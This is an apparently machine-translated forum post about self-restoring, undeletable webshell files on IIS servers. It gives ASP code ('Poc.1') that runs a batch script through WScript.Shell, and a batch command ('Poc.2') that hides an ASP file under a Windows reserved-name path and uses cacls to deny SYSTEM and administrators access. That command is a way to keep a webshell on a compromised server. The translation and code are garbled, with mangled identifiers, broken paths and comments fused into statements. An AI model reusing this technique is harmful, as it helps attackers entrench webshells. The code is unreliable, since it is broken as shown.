Methods To cope with infinite file recovery in webshell

In this case, a file in webshell (webshell only) cannot be deleted and cannot be modified. The attribute can be deleted after attributes is removed, but the file is instantly "full of blood, in the original place"

It seems that this situation has been encountered before. It was also discussed with knell at the beginning. It is agreed that a file under the Server intercepts some parameters through requst, and then uses Server. createObject ("Scripting. fileSystemObject ") to create the" undeleteable "file, set the Attributes permission, and then use the external server to continuously get and post the package to restore the file without limit --

In this regard, I wrote a script and tested it to perfectly prevent this disgusting attack method.

Poc.1:
____________________________________________________________________________
Function DelAttrib (TheFile) thefile is the file to be modified. You 'd better write a from form by yourself.
Response. write "Loading...:" & TheFile & "... <br>"
Set fs = Server. CreateObject ("Scripting. FileSystemObject ")
IF fs. FileExists ("\." & TheFile) then
Set f = fs. GetFile ("\." & TheFile)
F. Attributes = 0 set Attributes
Set f = nothing
Response. write "Less Success! "Prompt after success
If Right (TheFile, 1) = "" or Right (TheFile, 1) = "/" or Left (Right (TheFile, 4), 1) <> "." then
Call fs. DeleteFolder (EE, true) delete an object
Response. write "Delete Success! "
Else
IF fs. FileExists ("\." & TheFile) then
FN = LCase (Mid (TheFile, Replace (TheFile, "", "/"), "/") + 1 ))
If Instr (FN, "com") <1 and Instr (FN, "con") <1 and Instr (FN, "aux") <1 and Instr (FN, "prn") <1 and Instr (FN, "nul") <1 then
Set f = fs. GetFile ("\." & TheFile )'
F. Attributes = 0
Set f = nothing
End if

Fs. Deletefile ("\." & TheFile) 'deletion Mode Based on windows Reserved Words
Response. write "Delete Success"
Else
Response. write "Open File Fail! "Error message
End if
End if
Else
Response. write "Open File Fail! "
END IF
Dim external shell, StrExec, ExecName
Set writable Shell = Server. CreateObject ("WScript. Shell") Call wscript to execute the bat script of Poc.2
StrExec = "D: webcmd.exe/c" is the custom cmd file.
ExecName = "D: webjfcx1_dea. bat" here is the bat script uploaded to the server.
Mongoshell.exe c (StrExec & "& ExecName). stdout. readall
Set fs = nothing
End Function
_____________________________________________________________________________
Poc.2:
--------------------------------------------
Copy d: weba. asp \. d: web. asp & attrib \. d: web. asp + a + r + s + h & cacls \. d: web. asp/e/d IUSR_WSPC-HVJ5FRCT79 & cacls \. d: web. asp/e/g IUSR_WSPC-HVJ5FRCT79: r & cacls \. d: web. asp/e/d users & cacls \. d: web. asp/e/g users: r & cacls \. d: web. asp/e/d system & cacls \. d: web. asp/e/d administrators
The script is saved as bat, and d: weba. asp is the file path created by you. d: web. asp is the file path automatically restored. The iis user groups on different servers are different. Modify the file path by yourself.
--------------------------------------------